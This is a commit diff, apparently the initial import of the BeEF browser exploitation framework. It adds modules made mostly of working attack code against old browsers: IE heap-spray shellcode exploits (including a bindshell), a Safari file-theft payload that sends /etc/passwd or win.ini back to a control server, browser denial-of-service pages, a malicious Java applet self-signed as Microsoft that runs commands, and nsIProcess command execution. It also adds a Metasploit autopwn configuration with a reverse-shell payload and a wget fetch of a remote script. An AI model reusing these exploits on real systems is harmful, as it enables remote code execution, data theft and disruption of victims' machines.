Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial Import

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2010-01-11 00:54:08 +00:00
parent 11b1c899a5
commit 03ffb4703d
201 changed files with 18853 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

62
modules/browser/cve_2006_3730/index.php Normal file
View File

@@ -0,0 +1,62 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
..::[ jamikazu presents ]::..
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2
Author: jamikazu
Mail: jamikazu@gmail.com
Bug discovered by Computer H D Moore (http://www.metasploit.com)
Credit: metasploit, SkyLined
invokes calc.exe if successful
-->
<script>
function get_b64_code_2006_3730() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2006-3730', get_b64_code_2006_3730());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2006_3730());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2006-3730 (MS06-057)</div>
This module will launch calc.exe (Calculater) on Microsoft Windows. A vulnerability in
Microsoft Internet Explorer WebViewFolderIcon (setSlice) is exploited.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2006_3730/name.txt Normal file
View File

@@ -0,0 +1 @@
IE6 setSlice calc.exe (CVE-2006-3730)

38
modules/browser/cve_2006_3730/template.js Normal file
View File

@@ -0,0 +1,38 @@
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

80
modules/browser/cve_2009_0075/index.php Normal file
View File

@@ -0,0 +1,80 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8079
BeEF: the following is the boiler plate from the exploit
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
-->
<script>
function get_b64_code_2009_0075() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0075 (MS09-002)', get_b64_code_2009_0075());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0075());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0075 (MS09-002)</div>
Internet Explorer 7 Uninitialized Memory Corruption Exploit. This module targets
Windows XP SP2. Successful exploitation will start a bindshell listening on port
28879.<br><br>
The following command will connect to the listening bindshell:
<pre>
nc zombieip 28879
</pre>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">UserAgent Regexp</div>
<input type="text" name="regexp" value="/.*Windows.*/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2009_0075/name.txt Normal file
View File

@@ -0,0 +1 @@
XP SP2 IE Bindshell (CVE-2009-0075)

35
modules/browser/cve_2009_0075/template.js Normal file
View File

@@ -0,0 +1,35 @@
if(navigator.userAgent.match(REGEXP)) {
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}

52
modules/browser/cve_2009_0137/index.php Normal file
View File

@@ -0,0 +1,52 @@
<?
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following details refer to the source of this port
Billy (BK) Rios
Blog: Stealing More Files with Safari
http://xs-sniper.com/blog/2009/02/13/stealing-more-files-with-safari/
-->
<script>
function get_b64_code_2009_0137() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0137', get_b64_code_2009_0137());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0137());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0137</div>
This Safari exploit module will steal a file from the file system. On Windows
the 'c:\windows\win.ini' will be stolen and on a Mac the '/etc/passwd' will
be stolen.<br><br>
The results will be displayed in the log. <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/cve_2009_0137/name.txt Normal file
View File

@@ -0,0 +1 @@
Safari File Theft (CVE-2009-0137)

20
modules/browser/cve_2009_0137/snatchxml.php Normal file
View File

@@ -0,0 +1,20 @@
<?
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php");
?>
beef_url = "<?= BEEF_DOMAIN; ?>";
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<? echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
return_result(result_id, file_content);

11
modules/browser/cve_2009_0137/template.js Normal file
View File

@@ -0,0 +1,11 @@
function do_main(){
var iframe = document.createElement('iframe');
// pass result_id in the url
iframe.src = beef_url + 'modules/symmetric/xplt_cve_2009_0137/xss-max.xml' + '#' + result_id;
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
}
do_main();

66
modules/browser/cve_2009_0137/xss-max.xml Normal file
View File

@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>BeEF Browser Exploitation Framework</description>
<item>
<title>BeEF module</title>
<content:encoded><![CDATA[
<body src="/beef/images/beef.gif" onload="javascript:;
var req;
var req_file;
if (/Windows/.test(navigator.userAgent)) {
req_file='file:///c:/windows/win.ini'
} else {
req_file='file:////etc/passwd'
};
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET', req_file, true);
req.send('');
function processReqChange() {
if (req.readyState == 4) {
file_content = req.responseText;
result_id=document.location.hash.substr(1,document.cookie.length);
beef_url = 'http://' + document.location.host + '/beef/';
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = beef_url + 'modules/browser/xplt_cve_2009_0137/snatchxml.php';
js.type = 'text/javascript';
html_doc.appendChild(js);
}
}" <onload=""
]]>
</content:encoded>
</item>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>none</description>
<item>
<title>RSS sploit</title>
<content:encoded><![CDATA[
]]>
</content:encoded>
</item>
</channel>
</rss>

71
modules/browser/dos_chrome/index.php Normal file
View File

@@ -0,0 +1,71 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8573
BeEF: http://www.secniche.org/gthr.html
BeEF: the following is the boiler plate from the exploit
Advisory: Google Chrome 1.0.154.59 "throw exception" Memory Exhaustion Vulnerability.
Version Affected:
1.0.154.59 . Previous versions are vulnerable too
Description:
The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with throw statement. It makes the browser to consume memory thereby impacting the focussed window and leads to crash. The impact can be stringent based on different systems.
Proof of Concept:
http://www.secniche.org/gthr
Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are:1.0.154.59
Disclosure Timeline:
Release Date. April 28 ,2009
Credit:
Aditya K Sood
-->
<script>
function get_b64_code_cd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Dos Chrome', get_b64_code_cd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Chrome "throw exception" Memory Exhaustion</div>
Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service <br>
Executing NOP Sled and Shellcode to create an Exception.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_chrome/name.txt Normal file
View File

@@ -0,0 +1 @@
DoS Chrome

6
modules/browser/dos_chrome/template.js Normal file
View File

@@ -0,0 +1,6 @@
var nop_sled=unescape("%u9090");
var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
nop_sled=nop_sled+nop_sled;
document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
}

7
modules/browser/dos_firefox/ffkeygendos.html Normal file
View File

@@ -0,0 +1,7 @@
<html>
<body onLoad="document.forms[0].submit()">
<FORM>
<KEYGEN NAME="somekey" CHALLENGE="1125983021">
<INPUT TYPE="submit" NAME="SubmitButton" VALUE="Done">
</FORM>
</html>

46
modules/browser/dos_firefox/index.php Normal file
View File

@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: this exploit was downloaded from milworm
http://www.milw0rm.com/exploits/8822
-->
<script>
function get_b64_code_fd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Firefox', get_b64_code_fd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Firefox (Keygen)</div>
This will DoS firefox and give very limited interaction. A dialog will be displayed repeatedly.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_firefox/name.txt Normal file
View File

@@ -0,0 +1 @@
DoS Firefox (Keygen)

12
modules/browser/dos_firefox/template.js Normal file
View File

@@ -0,0 +1,12 @@
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/symmetric/xplt_firefox_dos/ffkeygendos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
return_result(result_id, do_main());

4
modules/browser/dos_generic/browserdos.html Normal file
View File

File diff suppressed because one or more lines are too long

43
modules/browser/dos_generic/index.php Normal file
View File

@@ -0,0 +1,43 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once ("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "This shouldn't be returned'";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Generic', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Generic</div>
This will DoS many browsers. A large string will be repeatedly
written using the JavaScript function document.writeln(). <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/dos_generic/name.txt Normal file
View File

@@ -0,0 +1 @@
DoS Generic

15
modules/browser/dos_generic/template.js Normal file
View File

@@ -0,0 +1,15 @@
// thanks pipes (mark@freedomisnothingtofear.com)
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/browser/generic_dos/browserdos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Executing now";
}
return_result(result_id, do_main());

BIN
modules/browser/malicious_applet/SignedUpdate.jar Normal file
View File

Binary file not shown.

52
modules/browser/malicious_applet/index.php Normal file
View File

@@ -0,0 +1,52 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// Module by: Joshua "Jabra" Abraham http://blog.spl0it.org
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// do some super escaping
cmd_str = document.myform.cmd.value;
cmd_str = cmd_str.replace(/\\/g, '\\\\');
cmd_str = cmd_str.replace(/\\/g, '\\\\');
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCMD_IE",cmd_str);
b64code = b64replace(b64code, "BEEFCMD",cmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Malicious Applet', get_b64_code_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Malicious Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Command</div>
<input type="text" name="cmd" value="c:\windows\system32\calc.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/malicious_applet/name.txt Normal file
View File

@@ -0,0 +1 @@
Malicious Java Applet

30
modules/browser/malicious_applet/template.js Normal file
View File

@@ -0,0 +1,30 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
if (_app == 'Microsoft Internet Explorer') {
var malicious = document.createElement("div");
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"> <PARAM name="codebase" value="../modules/standard/malicious_applet"> <PARAM name="code" value="Update">> <PARAM name="archive" value="SignedUpdate.jar">> <PARAM name="cmd" value="BEEFCMD_IE"> </OBJECT>';
document.body.appendChild(malicious);
} else {
document.write(
'<embed ',
'code="Update"',
'codebase="../modules/browser/malicious_applet/"',
'archive="SignedUpdate.jar"',
'cmd="BEEFCMD"',
'width="0"',
'height="0"',
'type="application/x-java-applet;version=1.6" />');
}
return_result(result_id, "Appet running");
}
applet();

53
modules/browser/mozilla_nsiprocess_interface/index.php Normal file
View File

@@ -0,0 +1,53 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCOMMAND", document.myform.command_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Mozilla nsIProcess XPCOM Interface (Windows)</div>
The nsIProcess XPCOM interface represents an executable process. JavaScript
code with chrome privileges can use the nsIProcess interface to launch
executable files. In this module, nsIProcess is combined with the Windows
command prompt cmd.exe.
<br><br>
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox
extensions) allows his module to execute arbitrary commands on the victim
machine.
<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Windows Command</div>
<input type="text" width="90%" name="command_str" value="ping localhost"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/mozilla_nsiprocess_interface/name.txt Normal file
View File

@@ -0,0 +1 @@
Mozilla nsIProcess Interface

17
modules/browser/mozilla_nsiprocess_interface/template.js Normal file
View File

@@ -0,0 +1,17 @@
// thanks Roberto (roberto.suggi@security-assessment.com) and Nick (nick.freeman@security-assessment.com)
function do_main(){
var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
var lPath = "C:\\WINDOWS\\system32\\cmd.exe";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
process.run(false,['/c', 'BEEFCOMMAND'],2);
}
do_main();
return_result(result_id, "command executed");

61
modules/browser/msf_autopwn/index.php Normal file
View File

@@ -0,0 +1,61 @@
<?
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Autopwn</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">LHOST (Required)</div>
<input type="text" name="LHOST" value="0.0.0.0"/>
<div id="module_subsection_header">LPORT</div>
<input type="text" name="LPORT" value="4444"/>
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_browser_autopwn()"/>
</form>
</div>

1
modules/browser/msf_autopwn/name.txt Normal file
View File

@@ -0,0 +1 @@
MSF Browser Autopwn

14
modules/browser/msf_autopwn/template.js Normal file
View File

@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Browser AutoPWN";
}
return_result(result_id, do_main());

9
modules/browser/msf_autopwn_manual/beef.rc Normal file
View File

@@ -0,0 +1,9 @@
use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 53
set SRVPORT 9000
set URIPATH /beef.html
sh -c 'cd /tmp; wget http://spl0it.org/files/msfautopwn.rb'
set AutoRunScript /tmp/msfautopwn.rb
run

59
modules/browser/msf_autopwn_manual/index.php Normal file
View File

@@ -0,0 +1,59 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "MSF_IP",document.myform.msf_ip.value);
b64code = b64replace(b64code, "MSF_PORT",document.myform.msf_port.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Metasploit Browser Autopwn (Manual Setup)</div>
<div class="entry">
This exploit requires an RC file for Metasploit. Unlike the other Metasploit modules,
this one requires the manual setup of the autopwn module.<br><br>
Metasploit Autopwn RC File:<a href="../modules/browser/msf_autopwn/beef.rc"> beef.rc </a><br>
<pre>
sudo ./msfconsole -r beef.rc
</pre>
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Metasploit Autopwn IP</div>
<input type="text" name="msf_ip" value="10.0.0.100"/>
<div id="module_subsection_header">Metasploit Autopwn Port</div>
<input type="text" name="msf_port" value="9000"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/><br>
</form>
</div>

1
modules/browser/msf_autopwn_manual/name.txt Normal file
View File

@@ -0,0 +1 @@
MSF Browser Autopwn (M)

17
modules/browser/msf_autopwn_manual/template.js Normal file
View File

@@ -0,0 +1,17 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'http://MSF_IP:MSF_PORT/beef.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);

68
modules/browser/msf_browser_expliot/index.php Normal file
View File

@@ -0,0 +1,68 @@
<?
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Exploits</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">Exploit</div>
<div id="exploits">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="module_subsection_header">Payload</div>
<div id="payloads">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="options">Loading...</div>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_execute_module()"/>
</form>
</div>
<script>
